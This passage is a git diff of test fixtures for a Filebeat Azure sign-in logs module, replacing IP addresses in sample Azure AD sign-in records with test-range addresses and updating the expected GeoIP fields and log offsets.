-        "event.original": "{\"Level\":4,\"callerIpAddress\":\"81.171.241.231\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.171.241.231\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
+        "event.original": "{\"Level\":4,\"callerIpAddress\":\"67.43.156.12\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"67.43.156.12\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
         "event.outcome": "failure",
         "event.type": [
             "info"
@@ -63,21 +63,17 @@
         "log.offset": 0,
         "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
         "related.ip": [
-            "81.171.241.231"
+            "67.43.156.12"
         ],
         "service.type": "azure",
-        "source.address": "81.171.241.231",
-        "source.as.number": 8426,
-        "source.as.organization.name": "Claranet Ltd",
-        "source.geo.city_name": "Farnham Royal",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5333,
-        "source.geo.location.lon": -0.6167,
-        "source.geo.region_iso_code": "GB-BKM",
-        "source.geo.region_name": "Buckinghamshire",
-        "source.ip": "81.171.241.231",
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "forwarded"
         ],
@@ -123,7 +119,7 @@
         "azure.signinlogs.result_signature": "None",
         "azure.signinlogs.result_type": "50140",
         "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
-        "client.ip": "81.171.241.231",
+        "client.ip": "67.43.156.12",
         "cloud.provider": "azure",
         "event.action": "Sign-in activity",
         "event.category": [
@@ -134,7 +130,7 @@
         "event.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
         "event.kind": "event",
         "event.module": "azure",
-        "event.original": "{\"Level\":4,\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.171.241.231\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
+        "event.original": "{\"Level\":4,\"callerIpAddress\":\"175.16.199.1\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"67.43.156.12\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
         "event.outcome": "failure",
         "event.type": [
             "info"
@@ -147,24 +143,20 @@
         "geo.location.lon": 2.12341234,
         "input.type": "log",
         "log.level": "4",
-        "log.offset": 1688,
+        "log.offset": 1684,
         "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
         "related.ip": [
-            "81.171.241.231"
+            "67.43.156.12"
         ],
         "service.type": "azure",
-        "source.address": "81.171.241.231",
-        "source.as.number": 8426,
-        "source.as.organization.name": "Claranet Ltd",
-        "source.geo.city_name": "Farnham Royal",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5333,
-        "source.geo.location.lon": -0.6167,
-        "source.geo.region_iso_code": "GB-BKM",
-        "source.geo.region_name": "Buckinghamshire",
-        "source.ip": "81.171.241.231",
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "forwarded"
         ],
@@ -326,7 +318,7 @@
         "event.id": "a9222177-db03-40ef-9b86-5b207ed72000",
         "event.kind": "event",
         "event.module": "azure",
-        "event.original": "{\"Level\":4,\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"durationMs\":0,\"identity\":\"Doe, John\",\"location\":\"US\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office365 Shell WCSS-Client\",\"appId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"On-Prem Access Only\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"123ebbf1-e868-4a77-bfd9-b59bd6c2412e\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":0,\"displayName\":\"ForceMFAfor B2C\",\"enforcedGrantControls\":[],\"enforcedSessionControls\":[],\"id\":\"0dff3d49-001e-413f-86eb-2800e789674c\",\"result\":\"notEnabled\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline policy: Require MFA for admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"a5527e71-9da1-41d0-859b-7ca84dae03a7\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline Policy: Blocks legacy authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"c1311105-97ac-4ebd-a866-5b215d066765\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"Netscaler MFA\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"ee756a5f-8c3b-41eb-8ace-0839597f718a\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":8,\"conditionsSatisfied\":19,\"displayName\":\"Enforce Verification on External Access\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"913f5adc-cd20-4b35-93b8-fbe145f68444\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Test Policy\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa\",\"result\":\"notApplied\"}],\"authenticationDetails\":[{\"RequestSequence\":0,\"StatusSequence\":0,\"authenticationMethod\":\"Previously satisfied\",\"authenticationStepDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"authenticationStepRequirement\":\"Primary authentication\",\"authenticationStepResultDetail\":\"First factor requirement satisfied by claim in the token\",\"succeeded\":true}],\"authenticationProcessingDetails\":[{\"key\":\"Domain Hint Present\",\"value\":\"True\"},{\"key\":\"Login Hint Present\",\"value\":\"True\"},{\"key\":\"Private Link Id\",\"value\":\"0\"},{\"key\":\"Azure AD App Authentication Library\",\"value\":\"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"createdDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"deviceDetail\":{\"browser\":\"Chrome 87.0.4280\",\"deviceId\":\"\",\"operatingSystem\":\"Windows 10\"},\"flaggedForReview\":false,\"id\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"ipAddress\":\"192.168.108.29\",\"isInteractive\":true,\"location\":{\"city\":\"Pierre\",\"countryOrRegion\":\"US\",\"geoCoordinates\":{\"latitude\":44.567081451416016,\"longitude\":-100.26722717285156},\"state\":\"South Dakota\"},\"networkLocationDetails\":[],\"originalRequestId\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"processingTimeInMilliseconds\":162,\"resourceDisplayName\":\"Microsoft Graph\",\"resourceId\":\"00000003-0000-0000-c000-000000000000\",\"resourceTenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\"userDisplayName\":\"Doe, John\",\"userId\":\"762a6171-29d0-456b-b88b-ca7f7d99728d\",\"userPrincipalName\":\"john.doe@example.com\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"time\":\"2021-01-26T13:39:55.7863053Z\"}",
+        "event.original": "{\"Level\":4,\"callerIpAddress\":\"175.16.199.1\",\"category\":\"SignInLogs\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"durationMs\":0,\"identity\":\"Doe, John\",\"location\":\"US\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office365 Shell WCSS-Client\",\"appId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"On-Prem Access Only\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"123ebbf1-e868-4a77-bfd9-b59bd6c2412e\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":0,\"displayName\":\"ForceMFAfor B2C\",\"enforcedGrantControls\":[],\"enforcedSessionControls\":[],\"id\":\"0dff3d49-001e-413f-86eb-2800e789674c\",\"result\":\"notEnabled\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline policy: Require MFA for admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"a5527e71-9da1-41d0-859b-7ca84dae03a7\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline Policy: Blocks legacy authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"c1311105-97ac-4ebd-a866-5b215d066765\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"Netscaler MFA\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"ee756a5f-8c3b-41eb-8ace-0839597f718a\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":8,\"conditionsSatisfied\":19,\"displayName\":\"Enforce Verification on External Access\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"913f5adc-cd20-4b35-93b8-fbe145f68444\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Test Policy\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa\",\"result\":\"notApplied\"}],\"authenticationDetails\":[{\"RequestSequence\":0,\"StatusSequence\":0,\"authenticationMethod\":\"Previously satisfied\",\"authenticationStepDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"authenticationStepRequirement\":\"Primary authentication\",\"authenticationStepResultDetail\":\"First factor requirement satisfied by claim in the token\",\"succeeded\":true}],\"authenticationProcessingDetails\":[{\"key\":\"Domain Hint Present\",\"value\":\"True\"},{\"key\":\"Login Hint Present\",\"value\":\"True\"},{\"key\":\"Private Link Id\",\"value\":\"0\"},{\"key\":\"Azure AD App Authentication Library\",\"value\":\"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"createdDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"deviceDetail\":{\"browser\":\"Chrome 87.0.4280\",\"deviceId\":\"\",\"operatingSystem\":\"Windows 10\"},\"flaggedForReview\":false,\"id\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"ipAddress\":\"192.168.108.29\",\"isInteractive\":true,\"location\":{\"city\":\"Pierre\",\"countryOrRegion\":\"US\",\"geoCoordinates\":{\"latitude\":44.567081451416016,\"longitude\":-100.26722717285156},\"state\":\"South Dakota\"},\"networkLocationDetails\":[],\"originalRequestId\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"processingTimeInMilliseconds\":162,\"resourceDisplayName\":\"Microsoft Graph\",\"resourceId\":\"00000003-0000-0000-c000-000000000000\",\"resourceTenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\"userDisplayName\":\"Doe, John\",\"userId\":\"762a6171-29d0-456b-b88b-ca7f7d99728d\",\"userPrincipalName\":\"john.doe@example.com\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"time\":\"2021-01-26T13:39:55.7863053Z\"}",
         "event.outcome": "success",
         "event.type": [
             "info"
@@ -339,7 +331,7 @@
         "geo.location.lon": -100.26722717285156,
         "input.type": "log",
         "log.level": "4",
-        "log.offset": 3390,
+        "log.offset": 3389,
         "related.ip": [
             "192.168.108.29"
         ],
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log b/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log
index 5531742794bb..2a1a461071f5 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log
+++ b/x-pack/filebeat/module/azure/signinlogs/test/test-non-interactive-user.log
@@ -1 +1 @@
-{"Level":4,"callerIpAddress":"11.22.33.44","category":"NonInteractiveUserSignInLogs","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","durationMs":0,"identity":"Hello World","location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Microsoft Teams","appId":"22222222-bce4-4aaf-ab1b-5451cc387264","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":0,"conditionsSatisfied":7,"displayName":"01 - Require Windows Hybrid AD Joined Device","enforcedGrantControls":["RequireDomainJoinedDevice"],"enforcedSessionControls":[],"id":"22222222-b7da-4d9e-ae41-779c5c256ac8","result":"success"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"05 - MFA für Gäste","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-e960-42e6-ae3a-355df7e475d5","result":"notApplied"},{"conditionsNotSatisfied":12,"conditionsSatisfied":19,"displayName":"02 - Mobile Device Policy","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-877a-4100-a0cf-5a589f2da3ad","result":"notApplied"},{"conditionsNotSatisfied":16,"conditionsSatisfied":3,"displayName":"04 - Block Legacy Authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8e59-4055-87b1-b54a055a7ca5","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"06 - Enterprise Apps","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-39cb-4ec4-8ed2-ac1352d260ba","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"03 - Require MFA for Admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-ea2f-4502-abb7-3689a1b0da41","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"07 - PowerAutomate Pilot","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8b95-43cb-8e7d-69e34704ab56","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02c - Mobile Device Policy Device Compliance","enforcedGrantControls":["RequireCompliantDevice"],"enforcedSessionControls":[],"id":"22222222-ff75-460a-800c-7fe88bd9c877","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02d - MacOS","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-9886-4897-b2e2-a096cd37bac3","result":"notApplied"}],"authenticationDetails":[],"authenticationProcessingDetails":[{"key":"Is Client Capable","value":"True"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"autonomousSystemNumber":3320,"clientAppUsed":"Mobile Apps and Desktop clients","conditionalAccessStatus":"success","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","createdDateTime":"2021-07-30T11:20:59.7789167+00:00","crossTenantAccessType":"none","deviceDetail":{"browser":"Edge 18.1836","deviceId":"22222222-1e7a-44dc-8bc9-5736d8e2b063","displayName":"ABCDEFG","operatingSystem":"Windows 10","trustType":"Hybrid Azure AD joined"},"flaggedForReview":false,"homeTenantId":"22222222-902d-4dea-8026-5a790862fede","id":"22222222-fb7b-4f83-bf74-3876f9ef3900","ipAddress":"11.22.33.44","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789123456},"state":"Niedersachsen"},"networkLocationDetails":[{"networkNames":["Hannover"],"networkType":"trustedNamedLocation"}],"originalRequestId":"22222222-fb7b-4f83-bf74-3876f9ef3900","privateLinkDetails":{},"processingTimeInMilliseconds":65,"resourceDisplayName":"Office 365 Exchange Online","resourceId":"22222222-0000-0ff1-ce00-000000000000","resourceTenantId":"22222222-902d-4dea-8026-5a790862fede","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","ssoExtensionVersion":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363","userDisplayName":"Hello World","userId":"22222222-473d-4f4e-a526-ff54e71afe84","userPrincipalName":"hello.world@company.de","userType":"Member"},"resourceId":"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"22222222-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:20:59.7789167Z"}
+{"Level":4,"callerIpAddress":"216.160.83.61","category":"NonInteractiveUserSignInLogs","correlationId":"22222222-18ab-4afa-aa79-21af67c8b108","durationMs":0,"identity":"Hello World","location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Microsoft Teams","appId":"22222222-bce4-4aaf-ab1b-5451cc387264","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":0,"conditionsSatisfied":7,"displayName":"01 - Require Windows Hybrid AD Joined Device","enforcedGrantControls":["RequireDomainJoinedDevice"],"enforcedSessionControls":[],"id":"22222222-b7da-4d9e-ae41-779c5c256ac8","result":"success"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"05 - MFA für Gäste","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-e960-42e6-ae3a-355df7e475d5","result":"notApplied"},{"conditionsNotSatisfied":12,"conditionsSatisfied":19,"displayName":"02 - Mobile Device Policy","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-877a-4100-a0cf-5a589f2da3ad","result":"notApplied"},{"conditionsNotSatisfied":16,"conditionsSatisfied":3,"displayName":"04 - Block Legacy Authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8e59-4055-87b1-b54a055a7ca5","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"06 - Enterprise Apps","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-39cb-4ec4-8ed2-ac1352d260ba","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"03 - Require MFA for Admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"22222222-ea2f-4502-abb7-3689a1b0da41","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"07 - PowerAutomate Pilot","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"22222222-8b95-43cb-8e7d-69e34704ab56","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02c - Mobile Device Policy Device Compliance","enforcedGrantControls":["RequireCompliantDevice"],"enforcedSessionControls":[],"id":"22222222-ff75-460a-800c-7fe88bd9c877","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"02d - 